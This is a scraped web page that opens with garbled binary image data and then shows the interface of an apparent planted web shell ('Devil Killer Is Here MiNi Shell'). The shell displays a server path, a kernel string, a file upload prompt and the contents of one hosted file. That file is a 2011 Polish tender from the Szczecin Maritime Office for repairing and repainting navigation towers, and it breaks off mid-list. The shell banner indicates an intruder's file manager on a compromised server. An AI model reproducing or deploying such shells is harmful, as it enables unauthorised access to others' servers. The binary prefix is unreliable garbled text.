JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110411/111449-N-2011.html

<p class="kh_header"><b>Szczecin: Remont stałych znaków nawigacyjnych: stawa dolna nabieżnika KARSIBÓR, stawa dolna nabieżnika GOŁOGÓRA, stawa dolna nabieżnika LUBIN, stawa górna nabieżnika LUBIN, stawa cyplowa na S cyplu półwyspu KOSA, punkt pomiarowy dla potrzeb nawigacyjnych w porcie ŚWINOUJŚCIE.</b><br>
<b>Numer ogłoszenia: 111449 - 2011; data zamieszczenia: 11.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Morski w Szczecinie , pl. Stefana Batorego 4, 70-207 Szczecin, woj. zachodniopomorskie, tel. 091 4403423, 4403523, faks 091 4403441.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ums.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont stałych znaków nawigacyjnych: stawa dolna nabieżnika KARSIBÓR, stawa dolna nabieżnika GOŁOGÓRA, stawa dolna nabieżnika LUBIN, stawa górna nabieżnika LUBIN, stawa cyplowa na S cyplu półwyspu KOSA, punkt pomiarowy dla potrzeb nawigacyjnych w porcie ŚWINOUJŚCIE..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.   Stawa dolna nabieżnika  KARSIBÓR
Stawa dolna wraz ze stawą górną stanowią nabieżnik KARSIBÓR, który wyznacza oś toru wodnego przez Kanał Piastowski i Zalew Szczeciński. Linia nabieżnika KARSIBÓR pokrywa się z linią nabieżnika MAŃKÓW.
Rodzaj posadowienia i konstrukcji:  cylindryczna wieża z laterną i galeryjką oraz dachem stożkowym,   wys. 16,0 m    pomalowana    na    kolor    biały   u stawiona    na    cokole    betonowym 
wys. 0,15 m n. p. z.

Cokół betonowy w kształcie ośmiokąta wpisanego w koło o średn. 5,0 m . Fundament betonowy prawdopodobnie wsparty na palach, których średnica i głębokość zabicia nie są znane.  Konstrukcja stalowa wieży zamocowana jest do fundamentu za pomocą kołnierza zewnętrznego z kątownika 140 x 140 x 14 mm 8-ma śrubami kotwiącymi M-45, oraz do 8-miu teowników 130 x 65 mm zabetonowanych w bloku fundamentowym.
Cylinder wieży  1,81 wykonany  z blachy stalowej, która dołem 2-ma rzędami nitów przymocowana jest do kołnierza zewnętrznego z kątownika 140 x 140 x 14 mm oraz przykręcona 4-roma śrubami M-18 do każdego z 8-miu końców teowników 130 x 65 mm, zakotwionych w betonie bloku fundamentowego. Wnętrze szybu komunikacyjnego podzielone jest na 3 kondygnacje oddzielone spocznikami z blachy ryflowanej. I i II kondygnacja ma wysokość 3,99 m, III 3,28 m. Nad III kondygnacją znajduje się kabina optyczna średnica 1,81, wys. 2,34 m, w której zainstalowana jest lampa nawigacyjna.
Okno w kształcie ściętej elipsy o wym. 101 x 101 cm zorientowane jest na kierunek toru wodnego. Laterna otoczona jest galeryjką szer. 0,79 m z podestem z blachy perforowanej ograniczoną barierką wys. 1,00 m.
Obiekt wyposażony jest w instalację elektryczną i odgromową.

Uwagi

Powłoka malarska konstrukcji stalowej stawy jest zniszczona i skredowana. Występują liczne drobne ogniska korozji powierzchniowej i wgłębnej. Okitowanie szyby okna laterny, ze względu na jego zły stan, należy wymienić na nowe.  Powierzchnia betonowego fundamentu w wielu miejscach jest spękana i skruszona. 

Zakres zamówienia 
Elementy stalowe znaku nawigacyjnego: 
a)	czyszczenie powierzchni z rdzy, zgorzeliny i starej farby do II klasy 
oczyszczenia według tablicy 2 PN-70H-97052				                  266 m2		   
b)	odtłuszczanie									     266 m2
c)	malowanie x 2 farbami epoksydowymi antykorozyjnymi 		              266 x 2 =  532 m2
d)	malowanie farbami poliuretanowymi (kolor biały) międzywarstwa		     266 m2
e)	malowanie x 2 emaliami poliuretanowymi (kolor biały)   	 	              250 x 2 =  500 m2
f)    malowanie x 2 emaliami poliuretanowymi (kolor czerwony)     	                   6 x 2 =   12 m2
g)   malowanie x 2 emaliami poliuretanowymi (kolor czarny matowy)	                 10 x 2 =   20 m2  
h)   wymiana uszkodzonej siatki miedzianej w odwietrznikach szybu 
komunikacyjnego i kabiny optycznej 4 szt. 				        	         0,18 m2
      i)   obustronna wymiana okitowania szyby okna laterny 
o wym.                                               1,01 x 1,01 m =  1,02 m2       x 2 					                                                                                                                   =     2,04 m2				 
Fundament:
a)	skucie nierówności betonu przy głębokości skucia do 10 cm na pow. 
pionowych i 5 cm na powierzchniach poziomych 20 + 15,7  		              =   36 m2
b)	deskowanie bloku fundamentowego						 =     8 m2
c)	uzupełnienie zbrojonych ław i stóp fundamentowych 
z betonu monolitycznego 							 =     2,67 m3		
2.   Punkt pomiarowy dla potrzeb nawigacyjnych przy fal wsch. w Ś-ciu  
Lokalizacja
Punkt pomiarowy dla potrzeb nawigacyjnych usytuowany jest  przy falochronie wschodnim w porcie Świnoujście

Rodzaj posadowienia i konstrukcji:  konstrukcja dalby z rury wielkośrednicowej średnicy 162016 mm, wypełnionej piaskiem drobnoziarnistym. Na rurze osadzona platforma konstrukcji stalowej o wymiarach 8,46 x 2,64 m, na której usytuowano wszystkie urządzenia wynikające z funkcji budowli. Połączenie z dalbą pomostem dojściowym za pomocą schodni z podpory lądowej na korpusie II ostrogi falochronu.
Uwagi

Na powierzchni konstrukcji stalowej  występują liczne miejsca złuszczenia farby i  ogniska korozji. Podstawa konstrukcji wsporczej,  w miejscu połączenia z fundamentem jest poważnie zniszczona. Występują b. duże wżery i  ubytki materiału, zagrażając stabilności konstrukcji. Niektóre stężenia poziome i krzyżulce w podporze lądowej oraz  stopnie schodów wejściowych na podest uległy w tak dużej korozji wgłębnej, że nadają się jedynie do wymiany.

Zakres zamówienia

Elementy stalowe znaku nawigacyjnego: 
a)	wycięcie skorodowanych elementów konstrukcji:
-  stopnie z blachy ryflowanej gr. 6 mm, o wymiarach 0,3 x 08 m    	      8 szt.  (  1,92 m2)
-  stężenie stopni z T NP 40; dł. elementu 0,8 m				    16 szt.  (12,8 mb)
-  krzyżulce stężające konstrukcję pomostu z  NP 60 x 35		      8 szt.  (  7,0 mb)
-  drabinki włazowe z kątowników 50 x 50 mm, dł. 2,0 m, (8,0 mb)
   rozstaw kątowników 0,6 m, ze stopniami z prętów o przekroju 
   kwadratowym 0,02 x 0,02 m,  (7 szt. x 2 = 14 szt. = 8,4 mb) 
   z zaplecznikiem z płaskownika 0,03 x 0,005 m	(6,0 mb)	                  2 szt.	
b)	wykonanie nowych elementów na wzór usuniętych: 
-  stopnie schodowe z krat pomostowych stalowych, ocynkowanie 	      8 szt.
-  drabinek włazowych z zaplecznikami, ocynkowanie 			      2 szt.
c)	montaż nowych elementów stalowych jw. w miejsce uprzednio usuniętych
d)	czyszczenie powierzchni z rdzy, zgorzeliny i starej farby do II klasy 
      oczyszczenia według tablicy 2 PN-70H-97052				                   285 m2	
d)   odtłuszczanie									     285 m2  
e)   malowanie x 3 farbami epoksydowymi antykorozyjnymi    		285 x 3 =   855 m2
f)	malowanie farbami poliuretanowymi (kolor biały) międzywarstwa	   	     285 m2
g)   malowanie x 2 emaliami poliuretanowymi (kolor żółty) 	                          285 x 2 =  570 m2
3.Stawa górna nabieżnika LUBIN
Obiekt spełnia funkcję oznakowania nawigacyjnego toru podejściowego do Lubina.
Wysokość światła - 52,8 m ponad wodą, zasięg światła - 5 Mm

Rodzaj posadowienia i konstrukcji
Czterościenna ażurowa konstrukcja stalowa, wysokości 15,0 m nad poziomem cokołu, wykonana z kątowników z ażurowym znakiem dziennym w kształcie rombu, wykonanym z tworzywa sztucznego. Cały znak pomalowany jest na kolor biały.

Konstrukcja  kratowa wieży składa się z dwóch segmentów łączonych śrubami. Wewnątrz konstrukcji przestrzennej wbudowana jest drabina włazowa z zaplecznikiem. Na poziomie połączenia segmentów znajduje się podest spocznikowy, zabezpieczony dwustronną poręczą. Na szczycie Kon strukcji, do balustrady przymocowany jest znak dzienny w kształcie rombu, wykonany z tworzywa sztucznego. w połowie dolnego segmentu konstrukcji stalowej zamocowana jest lampa nawigacyjna.
Posadowienie podstawy konstrukcji stalowej stanowi betonowy blok o przekroju w kształcie kwadratu o boku 3,68 m (górna powierzchnia), wystający 0,2 m ponad poziom przyziemia, posadowiony na głębokości 2,20 m pod powierzchnią terenu, gdzie poszerza stopę fundamentową do powierzchni o boku 5,0 m. podstawa konstrukcji stalowej wieży zamocowana jest do fundamentu za pomocą nakładki z kątownika 120 x 120 mm do wystających końców zabetonowanego w fundamencie segmentu przestrzennego kraty, i skręcona przy pomocy śrub, w każdym narożniku konstrukcji. obiekt wyposażony jest w instalację elektryczną i odgromową.
Uwagi

Powłoka malarska konstrukcji stalowej stawy jest zniszczona i skredowana. Występują liczne drobne ogniska korozji powierzchniowej. 

Zakres zamówienia 

Elementy stalowe znaku nawigacyjnego: 
a)	czyszczenie powierzchni z rdzy, zgorzeliny i starej farby do II klasy 
oczyszczenia według tablicy 2 PN-70 H-97052				                    152 m2		   
b)	odtłuszczanie									       152 m2
c)	malowanie x 2 farbami epoksydowymi antykorozyjnymi 		              152 x 2 =    304 m2
d)	malowanie farbami poliuretanowymi (kolor biały) międzywarstwa		       152 m2
e)	malowanie x 2 emaliami poliuretanowymi (kolor biały)   	 	              152 x 2 =    304 m2
4.Stawa dolna nabieżnika LUBIN
Obiekt spełnia funkcję oznakowania nawigacyjnego toru podejściowego do Lubina.
Wysokość światła - 34,0 m ponad wodą, zasięg światła - 5 Mm

Rodzaj posadowienia i konstrukcji
Czterościenny ażurowy maszt stalowy, wysokości 6,0 m nad poziomem cokołu,  pomalowany jest na kolor biały.

Przewiązki poziome i krzyżulce nitowane są do kątowników nośnych. Wejście na szczyt masztu zabezpieczone jest zaplecznikiem z płaskownika. Wewnątrz masztu zamontowane są trzy przepony stężające z blachy perforowanej. Na szczycie masztu zamontowana jest półka metalowa na wspornikach, na której umieszczona jest lampa nawigacyjna. 
Konstrukcja  znaku posadowiona jest na bloku betonowym o przekroju kwadratowym. Konstrukcja stalowa masztu zamocowana jest przez zabetonowanie w bloku fundamentowym dolnego segmentu konstrukcji stalowej. 
Uwagi

Powłoka malarska konstrukcji stalowej stawy jest zniszczona i skredowana. Występują liczne drobne ogniska korozji powierzchniowej. 

Zakres zamówienia 

Elementy stalowe znaku nawigacyjnego: 
a)	czyszczenie powierzchni z rdzy, zgorzeliny i starej farby do II klasy 
oczyszczenia według tablicy 2 PN-70 H-97052				                    20 m2		   
b)	odtłuszczanie									       20 m2
c)	malowanie x 2 farbami epoksydowymi antykorozyjnymi 		                 20 x 2 =   40 m2
d)	malowanie farbami poliuretanowymi (kolor biały) międzywarstwa		       20 m2
e)	malowanie x 2 emaliami poliuretanowymi (kolor biały)   	 	                 20 x 2 =   40 m2
5.Stawa dolna nabieżnika GOŁOGÓRA
Lokalizacja
Obiekt jest usytuowany na wzniesieniu południowego brzegu na południowy-zachód od miasta Wolin, na obszarze Wolińskiego Parku Narodowego. 
Stawa dolna wraz ze stawą górną stanowią nabieżnik GOŁOGÓRA , który wyznacza oś toru wodnego na krk 0,010 na podejściu do portu Wolin.
Obiekt zbudowano w latach 1968 - 1969, wg projektu Nr 3403, sporządzonego przez Biuro Projektów Budownictwa Morskiego w Gdańsku.
Rodzaj konstrukcji
Czterościenna, ażurowa konstrukcja stalowa z kształtowników walcowanych na gorąco, wysokości 12,90 m n.p.z.. z ażurowym prostokątnym znakiem dziennym o wymiarach 1,63 x 0,6 m (krótszym bokiem u dołu). Cały obiekt pomalowany jest na kolor biały.
Konstrukcja wieży w kształcie prostopadłościanu o przekroju poprzecznym  w kształcie kwadratu o boku 1,4 m, składa się z trzech segmentów, połączonym śrubami. Wewnątrz konstrukcji stalowej wieży znajduje się stalowa drabina wejściowa z zaplecznikiem. Wieża wyposażona jest w dwa pomosty, jeden w połowie wysokości a drugi na szczycie, wykonane jako konstrukcja ażurowa. Podest szczytowy zabezpieczony barierką ochronną w obrysie wieży. Na podeście górnym zainstalowane zostały: podstawa lampy nawigacyjnej oraz żurawik 50 kg. Konstrukcja ażurowa została zakotwiona w betonowym fundamencie. 
Teren posadowienia stawy o pow. 6,0 x 6,0 m ogrodzony jest płotem z prętów stalowych.

Uwagi

Na powierzchni konstrukcji występują ogniska korozji powierzchniowej. Powłoka malarska jest brudna i odbarwiona, miejscami złuszcza się. 

Zakres zamówienia 

Elementy stalowe znaku nawigacyjnego: 
a)   czyszczenie powierzchni z rdzy, zgorzeliny i starej farby do III klasy 
oczyszczenia według tablicy 2 PN-70 H-97052				         83 m2		   
b)	odtłuszczanie							                      83 m2
c)	malowanie farbami epoksydowymi antykorozyjnymi do pow. ocynkowanych    83 m2
d)	malowanie farbami poliuretanowymi (kolor biały) międzywarstwa do 
pow. ocynkowanych		       					         83 m2
e)	malowanie x 2 emaliami poliuretanowymi (kolor biały) do 
pow. ocynkowanych		       				      83 x 2 =166 m2

6.Stawa cyplowa na S cyplu półwyspu Kosa 
Lokalizacja
143 m na wschód od osi na 4,650 km toru wodnego Świnoujście - Szczecin.
Rodzaj konstrukcji
Czterościenna, ażurowa konstrukcja stalowa o wys. 5,75 m n.p.z. z cylindryczna laterną i galeryjką oraz daszkiem stożkowym, pomalowana jest na kolor zielony. 
Rozstaw słupów nośnych na dole, w kształcie kwadratu o boku 3,0 m, zwężający się ku górze. 
Skratowanie wykonane jest z kątownika. Podest galeryjki wykonany jest z blachy ryflowanej o szerokości 0,85 m, zabezpieczony barierka wysokości 1,0 m. Na podeście zamontowana jest laterna
O 2,0 m, wysokości 2,0 m, pomalowana na kolor czarny, z daszkiem stożkowym wysokości 0,6 m. Wewnątrz kabiny optycznej ustawiony jest stół żeliwny, na którym ustawiona jest lampa nawigacyjna. Laterna oszklona jest dziesięcioma szybami o wym. 0,8 x 0,5 m. Wejście na górę umożliwia stalowa drabinka.
Całość posadowiona jest na żelbetowych stopach fundamentowych 100 x 100 wys. 105 cm

Uwagi

Powłoka malarska konstrukcji stawy jest zniszczona i skredowana. Na elementach stalowych występują liczne ogniska korozji powierzchniowej. Laminat na daszku laterny uszkodzony i odstający.
Liczne ubytki w okitowaniu szyb w oknach laterny.

Zakres zamówienia 

Elementy stalowe znaku nawigacyjnego: 
a)	usunięcie starych, zniszczonych warstw laminatu z daszku laterny 	          6 m2	
b)	czyszczenie konstrukcji stalowej stawy z rdzy, zgorzeliny i starej 
farby do II klasy oczyszczenia według tablicy 2 PN-70 H-97052		        90 m2
      c)   przygotowanie i wyrównanie podłoża daszku laterny
      d)   odtłuszczanie							                    90 m2
      e)   ułożenie nowego laminatu wykonanego z pięciu warstw maty 
      szklanej, utwardzonej żywicą epoksydową -  tj. 6 m2 x 5 warstw                =   30 m2	
f)    malowanie x 2 farbami epoksydowymi antykorozyjnymi 		    90 x 2 = 180 m2
g)   malowanie farbami poliuretanowymi (kolor biały) międzywarst                        80 m2
h)   malowanie x 2 emaliami poliuretanowymi (kolor zielony)   	    80 x 2 =   40 m2
i)	malowanie x 2 emaliami poliuretanowymi (kolor czarny matowy)    10 x 2 =   20 m2
j)    obustronna wymiana okitowania szyb w oknach laterny o wym. 0,8 x 0,5 x 10 szt. x 2 						                                                                  =     8	m2		         
Technologia malowania powierzchni stalowych

1.	Grunt -  farba grubopowłokowa, epoksydowa, utwardzana poliamidem, pigmentowana blaszkowanym tlenkiem żelaza (błyszcz żelaza) o nw. właściwościach:
- przeznaczona ogólnie jako grunt, międzywarstwa, lub farba nawierzchniowa w systemach powłokowych na konstrukcje stalowe lub betonowe, narażonych na oddziaływanie lądowych i morskich czynników atmosferycznych,
- przeznaczona do ponownego przemalowania farbami dwuskładnikowymi i konwencjonalnymi, również po długim czasie starzenia w warunkach atmosferycznych,
- odporności mechanicznej połączonej z długotrwałą elastycznością ,
- bardzo dobrej przyczepności do starych powłok epoksydowych,
- łatwa w aplikacji zarówno natryskiem bezpowietrznym jak i pędzlem,
- odporna na wodą i rozprysk średnioagresywnych chemikaliów,
- odporna na niskie i wysokie temperatury. 

2.	Grunt na pow. stalowe ocynkowane -  farba epoksydowa, o nw. właściwościach:
- przeznaczona ogólnie jako grunt, międzywarstwa, lub farba nawierzchniowa w systemach powłokowych na konstrukcje stalowe ocynkowane, narażone na oddziaływanie lądowych i morskich czynników atmosferycznych,
- przeznaczona do ponownego przemalowania farbami dwuskładnikowymi i konwencjonalnymi, również po długim czasie starzenia w warunkach atmosferycznych,
- odporności mechanicznej połączonej z długotrwałą elastycznością ,
- bardzo dobrej przyczepności do starych powłok epoksydowych,
- łatwa w aplikacji zarówno natryskiem bezpowietrznym jak i pędzlem,
- odporna na wodą i rozprysk średnioagresywnych chemikaliów,
- odporna na niskie i wysokie temperatury. 

3.   Emalia poliuretanowa nawierzchniowa o nw. właściwościach: 
- do malowania elementów powyżej linii wody,
- dobrze zachowująca kolor i połysk,
- odporna na zachlapanie łagodnymi chemikaliami,
- hamująca rozprzestrzenianie się ognia,
- aplikowana w niskich temperaturach do - 10o C,
- o odporności mechanicznej połączonej z długotrwałą elastycznością,
- odporna na wodą morską,
- o odporności mechanicznej połączonej z długotrwałą elastycznością,
- odporna na niskie i wysokie temperatury.
4.   Emalia poliuretanowa nawierzchniowa o nw. właściwościach: 
- do malowania elementów stalowych ocynkowanych,
- dobrze zachowująca kolor i połysk,
- odporna na zachlapanie łagodnymi chemikaliami,
- hamująca rozprzestrzenianie się ognia,
- aplikowana w niskich temperaturach do - 10o C,
- o odporności mechanicznej połączonej z długotrwałą elastycznością,
- odporna na wodą morską,
- o odporności mechanicznej połączonej z długotrwałą elastycznością,
- odporna na niskie i wysokie temperatury.

Kolorystyka: biały - RAL 9003, czarny - RAL 9005, żółty - RAL 1023, zielony - RAL 6018

Wszystkie obiekty wyposażone są w instalację  elektryczną wyłącznie dla potrzeb oznakowania.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.33.40-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada niezbędne doświadczenie, jeżeli wykaże, iż w ciągu ostatnich pięciu latach, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  wykonał minimum 3 roboty  podobne do objętych przedmiotem zamówienia, o wartości co najmniej  40 000 zł każda.
           Za prace podobne  Zamawiający uzna prace remontowe i konserwacyjne
              konstrukcji stalowych obiektów przemysłowych lub hydrotechnicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
